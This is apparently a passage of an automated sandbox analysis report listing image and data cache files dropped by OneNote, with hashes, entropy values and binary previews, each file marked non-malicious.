Preview:	2...>.......h...v...\...................................................................................................................................2...>...D.......v................................I.......I.qk..B.....LZ.I[......I[..fJ.4....X).I[..fJ.4....X).I[..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............U.F......l.e.......N...^................x6+.H.G..{.5d&.........f........................................I.qk..B.....LZ.............U.F......l.e............U.F......l.e.............I[......I[......I[..........................................I[j.....I[T.]...I[......I[..B...I[H.....I[..B...I[..>.).I[..J...................;........4...4...4.."...............I[..I[..I[..z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4..........I[......I[....#.I[............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000062.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	52945
Entropy (8bit):	7.6490972666456765
Encrypted:	false
SSDEEP:	768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
MD5:	AD003F032F32FAC4672D4CE237FA5C5B
SHA1:	AE234931B452F0D649D91291763B919CF350EA49
SHA-256:	ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
SHA-512:	ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k\|...S..d.4.>.RW5z.$.i.)V.O....>o...c..&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N..\|.4...80.#..e....t.J..ZQ.x\|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......\|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G\|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000063.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.3963695535605405
Encrypted:	false
SSDEEP:	96:mQsysOiWdVz5J1oEbAX8M9K6xRyGGp/I1ODzLJd:mQsPWdVz5VbAX8M9K6xRyn/I
MD5:	51FD518E944878F46EC19283DBD70D88
SHA1:	1B5F937A65F5EB36F52AE2F68B0E5F9A9290B09B
SHA-256:	9E733F0680BE115163B28529B9DFD57D2A57F7E0D0D1B2519F59E2D85698A869
SHA-512:	46ADC124B234E164433352FCD2C3501A0355546DCC446C2295B8D46ED74FAF2CE81E1EF2C11F4CB5C0D6752328DDCB600C620BAB91B8155943AE35255BF08A27
Malicious:	false
Preview:	2...>.......h...v...\...................................................................................................................................2...>...D.......v................................I.......I.qk..B.....LZ.............5..+q...<......5..+q...<......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.................f...7..0Xo.....N...^.................j..P.H.K....N*........f........................................I.qk..B.....LZ................f...7..0Xo.............f...7..0Xo.........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...)..7)..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000064.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	79656
Entropy (8bit):	7.966459570826366
Encrypted:	false
SSDEEP:	1536:2kuUliOeU4os8ii3nF3Hxro/qxXD9u/kjYgMZqoEs6ZUldm:3uUsOXYIAixR2k7WAZV
MD5:	39FF3ACAE544EAC172B1269F825B9E9F
SHA1:	2D40DE8D90BD21D56314D3F99CEF4FBAE3712C0F
SHA-256:	70475431CCA3C91A4EFA3B8F04864371D2D3A45696674A1A0562FE9CD8DB287C
SHA-512:	3B9F3B32696AB7779864E83DC0C45960114A130BEE0CF4D0643DE57FF952171E5D775AA49141EE31A28A9B5D052B26EB421F26EA736D7EF4B3A7EC812CA411CB
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1A.Qa"..q.....2#..BRb..r3$.Cc..Ss.4...D%5&..T...'7....................!1.A..Q.aq..."2.....B3.r.#..R...bc$4..D.s%............?..Y..T.o.\......=.a..j..'^..s..[../........Y.......<...(..4.....7y..Ln.[9.cK.ilN...u@$.V.9.V?3..s.KL.z..w.jW.C.............@.~+.o?o8...k....,.m..9.".....q.....d....z.W...q...~...'..e..>..f#...S.....F....pU.......7..N.vfK......S..G.#.....}.c.........RXt.bq1.`.....[+8\..N..:......}.....r..........')......Na...&...m......c...a4_%d.............co..0.n.L.Q..E.Lt..y.\|..F..4.i(>.._..\.eNL8..?z9I:hLgC.@.p....g.t......'.I!d..?1f..R..........\|..4.wJ..%g..~0bt.....*...v.......O...:.~.>~..o.x...9.@>...s.&.E.0/G.c..t.<..F.t.A.z. ......;.........Gp.P

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000065.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.416895092301275
Encrypted:	false
SSDEEP:	48:YsZ0/E8kUzK+t5vEL7XEWnYPqlBXYmQ97woNrdqr2diHDRXjD3FBJLxn:Ys98z2+3W7XEzaXYmQ97wcRy2eDFJL
MD5:	1B02FB352E1869F084942F2E2DA03A37
SHA1:	AE274DF014074C9B7C400B5B1B55EA77F8EE3478
SHA-256:	DCC5F4399A5DE306DD895F22390A34006D453E992F9F34C19AF0161CA54222D5
SHA-512:	BC9C09AABEBEA083526F6723CA76D844A95099DC8F86676D75E4F961C14D0DFD74E4BB5903AEA345E991520C194B2F83012DD4E7A132B9CF144DE3C37ACB9541
Malicious:	false
Preview:	2...>.......p...v...d.....................................................?....?........................................................................2...>...L.......v................................I.......I.qk..B.....LZ.V.......V.P......<...>.V.P......<...>.V...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............d..Ay....(p.$W.....N...^................R.{QlVB..~..X.2........f................................... ....I.qk..B.....LZ............d..Ay....(p.$W.........d..Ay....(p.$W...........V.......V.......V...........................................V.j.....V.T.]...V.......V...B...V.H.....V...B...V...>.).V...J...................;........4...4...4.."...............V...V...V...z...y.. x.. ...........$........4.....7..7........................;........4...4...4..........V.......V.....#.V.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000066.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	40884
Entropy (8bit):	7.545929039957292
Encrypted:	false
SSDEEP:	768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
MD5:	7379775A1E2AB7FAB95CFFCE01AE05F3
SHA1:	3D3DDFD8AC7E07203561BAE423D66F0806833AB3
SHA-256:	9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
SHA-512:	4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000067.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.324775612064059
Encrypted:	false
SSDEEP:	48:YuzistIzoqzDX63teAXEfJc+L/XOv/9Xj1olrdqrgKtjRXITAoDqBy1ZbyUR:YxseDX63dERc+L/XOv/9z1ERygUjbTU
MD5:	EB21DEBCE39DA1DFA5651264E3F549C9
SHA1:	5635CC4EF64B1C0583BAAEBDE8DF915210CF62BD
SHA-256:	ABB1C5DAE2E5A9F28171A0F16B13FA301A53F6976101030335BEF54BF8BA0506
SHA-512:	4CDDD351DA1AAB214DA6C535D2F24A146AA0BC9324A191124AFD226133205705BB94A081F1D49669FF37A1B7C87B611CEDFD239F717845F99A76760573DA5EF2
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ.........:.wh.......M...:.wh.......M.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................)Y...%.4..O.N....N...^...............7f.,..gE..P.h7.........f........................................I.qk..B.....LZ...............)Y...%.4..O.N...........)Y...%.4..O.N....................................................................j......T.]............B....H........B......>.)....J...................;........4...4...4.."........................z...y.. x.. ...........$........4.....7..7........................;........4...4...4......................#.*.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000068.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
Category:	dropped
Size (bytes):	68633
Entropy (8bit):	7.709776384921022
Encrypted:	false
SSDEEP:	1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
MD5:	41241EE59AB7BC9EB34784E3BCE31CB4
SHA1:	98680761A51E9199CF3C89F68B5309FBEC7EE3CB
SHA-256:	035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
SHA-512:	3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000069.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.432454931759613
Encrypted:	false
SSDEEP:	96:5esTIYAJcEg39mX5X/RcJj9T7gTRyjKtI:5esTIjXg39mX5X/qh9T7MRyjK
MD5:	F6CED293A8135EA05C4172D81DD1D026
SHA1:	B3435CD9166023B1832D529F87EA2229EFA988E6
SHA-256:	74AE48DA63C529215B2A44429894B44D41F4082DA77F43784BF127349CFEF46E
SHA-512:	A13646286C8B96B5EDEA82A419CE15EF9670EED4E798C6093752EA6BAEBC46D8F33E5C5F674D3FEDB67B841C85FBE9CB19F8096455EA12396B2853934E31F219
Malicious:	false
Preview:	2...>.......t...v...h...................................................................................................................................2...>...P.......v................................I.......I.qk..B.....LZ...........H..8n..V.8...H..8n..V.8.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................m....dv(@#......N...^...............NTO.X%"K.&.\............f...................................$....I.qk..B.....LZ...............m....dv(@#.............m....dv(@#..........................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4.....7..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006A.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 176 x 513, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	11043
Entropy (8bit):	7.96811228801767
Encrypted:	false
SSDEEP:	192:YyroOCsBI9pkCFsHHX2RE6VOlPuIqmBtJNBfAr+ADP1IATaNeTyZ4GF+WQQ6Qwq2:BUOCsB2kCGH32RiPDtDBfArPDP1I/eyM
MD5:	8E9AB9C28B155A66BC5C0DA5E2A4EFB5
SHA1:	972E61F162D48F1CEE21963ECBB2FE439105DB55
SHA-256:	B243A24FA13BC8523450E22F408F9EFF15301C938F8CA52A57018B58CE6785DE
SHA-512:	12062D69E676B3B34AFCEF25AC17B40294282D5BAB6C0110680293D7CC96EC17EBCFE104C284E64A30EE3C483E319E9C37C03F6EE82C79632180E45C7A684E8C
Malicious:	false
Preview:	.PNG........IHDR..............`....`PLTE............................................................................................... .......bKGD....H....cmPPJCmp0712....H.s...*YIDATx^.]...,.N.8.i......0..e..y.......8.6....Fo.........=...F..._..........O..{..............3.\|.L.\|.............>.....v..n.1J...k...."....7........J._.5LQ`..k...._Z.W.x:..k...g..._.....u<.Q{...1...q6.cs...l............30.g...< W...a.5..>O....9}..c..........s\|I.).>.fo4.<q......>...c.:.u..co.#.7,.O..G./.K.\|..q.p...(.(....iH.......m..+.7...../..{W.l....b....?.`^.q.9L&.>.hN2`1..m...]$.0J....rBy......{.._...G....;.r.Q..;..,...9..F...t;.+..2.Ub......V...8.k..5.........'[..s.H..).......%j._.&.....BN..V..q...T...#..........0.E&.o7....$..m..8g.f._$..k.8...5......HgQ...L..\.........)B.I.r.(..8.a..$N.9.=..o..Q..(.e.a..O.....c.= .......$0..X.S,..(p......$..l.c.I...=."......g....^..#~,&.a9iK..ZNE`...pFJ.@Wd?.<..Bt.E.......e...i.%d...}.!..B......9.........B}.....5...;..hL.D.....4z.....\|.)

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006B.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.338097583155894
Encrypted:	false
SSDEEP:	48:QsEJlyhl+HXti4PEQLjXoh9rFotrdqrHlRX25I9BdF:Qsawhl+HXBPEQnX09rFERyFAc
MD5:	CC72C14CED76328B5513A384E762BECC
SHA1:	981FBC2985035524A7535115E3C1CD4F04DED49D
SHA-256:	440607E209D1E6F9F991B0CF1C6820D1ED243211CE39998D21D61D121F14F68B
SHA-512:	87FF3355BBCC19D5C89A07755E1DC25D62DB62AED0D2034DDE2C515007331E91E93F36C99A75153B3349AACB40C8D64AFFA216BC6E308DF60F0D70A9B122BA87
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ...........?......t........?......t..........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............6..K...;..=.J.$....N...^................P...hU@..T.k.........f........................................I.qk..B.....LZ.............6..K...;..=.J.$.........6..K...;..=.J.$........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4.....7..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006C.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 650, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	647
Entropy (8bit):	6.854433034679255
Encrypted:	false
SSDEEP:	12:6v/71rwqZMXVs99W1YvpLp/Fvl+f43ocLtuplb+CrGotLRd:+wqWXVs99rpLpNvr3pIx3b
MD5:	DD876AA103BEC3AC83C769D768AD39FB
SHA1:	1833603AA9B6A7E53F9AD8A336F96CCE33088234
SHA-256:	1262DD23AD54E935CFA10FEB1BE56648E43BEF1116696CA71D87E6E033B1CA7D
SHA-512:	946DB2277213104A3B29EC4388578B05027B974A3093B4CCAD8847397AA51AE308BC6A199E5705E1F901D6E4B1BA34D8DECFD6E5B6685184A307D749D7CFAEDD
Malicious:	false
Preview:	.PNG........IHDR...(.........xk....`PLTE.........................................................................................>.S.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.)..1..7w....6.*.H`T6.ha.k.............b!....Ba..C..P.4K..@.....h.E..X....PX+.P.-.....@@"...o.O4....xZ<...B...B..,A..y.s<......b!....Ba..C..0_p. .......=..,...i. ...=.j..N...........{4+...xZ<...B....\|.....$.K<.vyE..X....PX+.P.-.:... .'p......\,...i. ...=.j........K.....%J..S+.....q..k.H.@DD.s...:..J.K.DDL.\.@`,.DD.:.(]..N....KD....A M.....F..S+.....1.sq........\.t..;..../...~k...4.DD.:..]..N....KD........@DD.s...:..J.K..[...Q....V......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006D.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.373387427377533
Encrypted:	false
SSDEEP:	48:KBsv/LD4jVe2aJOtEKkEjFLuX3CK9jBoUsrdqrKLFt6sRXWbkPk8Qg:Ks7DIw2aJOyEjFCX3Z9jBcRyKhtrppQ
MD5:	C8D4EF0AD390BE8F6AA9BB7EE1AF385D
SHA1:	6CFC92B35FEBCFFE0F1E29E73A85045DD9FCA792
SHA-256:	FD6EB67A705CEA29CA22D696AFEA76E0229DDCAA2B232534C2524329F13DFD9A
SHA-512:	402B083DE373077CA22574685B579598D81209DD9FB1E76F5556C46112CDE3440EAB854C8F08609A76C950F566F06148B82AED03646396606EC7588D6A31D7EF
Malicious:	false
Preview:	2...>.......T...v...H...................................................................................................................................2...>...0.......v...\|............................I.......I.qk..B.....LZT.......T..b..a.....G.T..b..a.....G.T....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............vZ....j....^........N...^..................\.6.L.......=........f........................................I.qk..B.....LZ............vZ....j....^............vZ....j....^.............T.......T.......T...........................................T..j....T..T.]..T.......T....B..T..H....T....B..T....>.)T....J...................;........4...4...4.."..............T...T...T....z...y.. x.. ...........$........4.....7..7........................;........4...4...4.........T.......T......#T..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006E.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:27:10], progressive, precision 8, 102x792, components 3
Category:	dropped
Size (bytes):	52912
Entropy (8bit):	7.679147474806877
Encrypted:	false
SSDEEP:	1536:DB/nIviNJD9C8kfJj6TkVr4q24FsUpjPc021si:DdnIvi3D9C8Cl6Dq24ayPCz
MD5:	1122BF4C2A42B4FA7F29D3C94954A7C9
SHA1:	3750077A830FE21735A43ABD35C63BA9A4D4B0DE
SHA-256:	423B0DD1A93B391D15B1DC8D8757C3BF5725FF2E7A59E6E3140033E2876B67F6
SHA-512:	4626EFE2EDED2361D6296B57F994DC434CC9D02357A8A6A67D84A544FB8A1CFE0005EA98F846AB963BED7F2B6CE96BC9181182C9459843A52A98D3A731A4FE73
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM..............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:27:10............................f.........................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....]+\.9.9.P.d..Z.?~>.-...]6=...........S.9G...b<$..Z..........>.v.o:.o%.e...z.F`...[.wo..z.....k..E...5....G..7.......c2..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006F.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.334725983459085
Encrypted:	false
SSDEEP:	48:lcsRfQzwWLult0Y0EkYWRXjdx97poEsrdqrfusRX8VLf1rPlF:lcsyciulOpEkvXZx97pHsRyverd
MD5:	0B3EDD2AC8629E0329D20BB78BADBFA4
SHA1:	BA69DC3265152E6402F1B436EFB72449F54AF97E
SHA-256:	3F8CC9CCF622DC70400407E42C8D6B875FE83696224043B6300129F72A216C7C
SHA-512:	A0284C1D303A1B9DF8E5F9BD143FD56C904E7D9327F0232E9ACE65800FB9AD73341B2B67C8C4B9A821FDD692E5F1D83987F149F642C5EAAF049C2B6FB7858DFD
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>..........v...v...........................\|.......\|../.O..!.p..Q..I.......I.qk..B.....LZ\|../.O..!.p..Q.\|....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............\p.S...9.q....$....N...^...............d.f..X.F.X%.4.........f........................................I.qk..B.....LZ.............\p.S...9.q....$.........\p.S...9.q....$.........\|.......\|.......\|...........................................\|..j....\|..T.]..\|.......\|....B..\|..H....\|....B..\|....>.)\|....J...................;........4...4...4.."..............\|...\|...\|....z...y.. x.. ...........$........4.....7*..7........................;........4...4...4.........\|.......\|......#\|..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006G.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
Category:	dropped
Size (bytes):	27862
Entropy (8bit):	7.238903610770013
Encrypted:	false
SSDEEP:	384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
MD5:	E62F2908FA5F7189ED8EEBD413928DEE
SHA1:	CA249B4A70924B73BDA52972E9C735AEC35A0C5D
SHA-256:	20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
SHA-512:	EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..\|.Q..I.&.. ......"T4)wdH.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.489948658676063
Encrypted:	false
SSDEEP:	48:Jits3YEJKUDh2bMtxGb+qE5zAyXgY9bXoRrdqr9UEJPmRXq+NTXHNFJ:Jits0UDogaJE50yXgY9bX4Ry9UsPm9X
MD5:	96B1D5395E41FB7E9F9DF61DFC36EED2
SHA1:	BAD2D6EE2833435D3DA173E697F2B8600AD59DE4
SHA-256:	52D056EEE78620CCD2E2BEC7B9132FAC59E80B30DBBB331486961F8418E4754E
SHA-512:	96F98716DDD2592FF496B955F1E8726D805CD00E68B35EE0210FEFBDFCBFE9E51E2F954A6B1B12C92C1CE0F19F45624EB89B424172FDBC495FAA8C8054A6522B
Malicious:	false
Preview:	2...>.......r...v...f...................................................................................................................................2...>...N.......v................................I.......I.qk..B.....LZ6.......6..9Qg...Eu.f9.=6..9Qg...Eu.f9.=6....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............jv.W..=.OD..v.....N...^..................v(4E.....=._........f..................................."....I.qk..B.....LZ..............jv.W..=.OD..v...........jv.W..=.OD..v..........6.......6.......6...........................................6..j....6..T.]..6.......6....B..6..H....6....B..6....>.)6....J...................;........4...4...4.."..............6...6...6....z...y.. x.. ...........$........4.....7..7........................;........4...4...4.........6.......6......#6..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006I.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 50 x 556, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	977
Entropy (8bit):	7.231269197132181
Encrypted:	false
SSDEEP:	12:6v/7QiFJaY/z+obuqFA4fypjQSbtBK+lcqNGSbb7XTJArRRzN5DjNRkPmu5cCbR2:x0QY7xbjy9pY0JPXLTWroeuCCbX0
MD5:	B7F74C18002A81A578A4EE60C407A8D3
SHA1:	70A7D4BB1B3ADF4397D168AD0D81B286F88EBDE0
SHA-256:	95F59A0433050180D4C0E8858B83363D51BEA6752A8B7CA516A8677854D8F5B6
SHA-512:	13186A7CDCE80BCA9D2238666D6D7A989FA1887EABFA5D8A9A63EEC304DFD4BE8EFF652205FA56E1D1CEE7D3680AF8C70A952AF73AB3C246400E8D4EBECBDBA9
Malicious:	false
Preview:	.PNG........IHDR...2...,........A....PLTE...................................................................................................................................................................................$.y.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^...0.D_.......cck.....%a...X.a0Y...-..!.G...[....(.r.H.$...1 .zq.4V.e\|a.6.X..4..kl.%....=w....6..TN.....{.4..T/.z...../.....3..!~..t.#b..^.....E!.SFb ...-.....^...,..C.!.b...i._c...s.X.w.. lsQH..H.gKc@@...i. ....m...;Ci....@G.; V{..lO..\.R9e$..{.....P...E.+.2.0D.B,..P...56.?......K.6..TN....^z.4..T/.z...../.....3..!~..t.]b........E!.SFb ...-.....^...,..C.!.b...i._c..Y.O...?.9k2.M.?5 .n.P...,...d._..%M?....6....,.1..R.4.a.R.+..U.Q..P...vd..T........j .]@....."..lJ../.90.4...Y. ...9.%...{......Hc%.....i..%M?aG..H....o.q.......4.......X.d9.r..CI.O.5.Ri0?.s\b....w...>/k..4V.)Y....P...vd..T........j .]@....."..lJ../.90..2..MP..l..?....K.X.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006J.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.340621982264617
Encrypted:	false
SSDEEP:	96:KZscGTH87D48zE3T1XE9DkejlRyI+rTo5gGqy:sscGTHqD7gj1XE9DkalRy/rTo5gG
MD5:	0F6CD8F15AFF717228F5EF8976BCB1BD
SHA1:	2C0EA08E7FE6018E2776E5D9290E38AAC5E69820
SHA-256:	2DCABAAF31CE42C87D8F837CE456C124A5A32FD99E6E6334F865F10C3D43078D
SHA-512:	627B6DB077429CEB5346EA9C3E2D82D05FC37735B10A00C6CC0FF242E8E91253DB9F9F2919FA923BF370DFF48ED2898BF9A534F42CA2E526F8C21ECE11FA0554
Malicious:	false
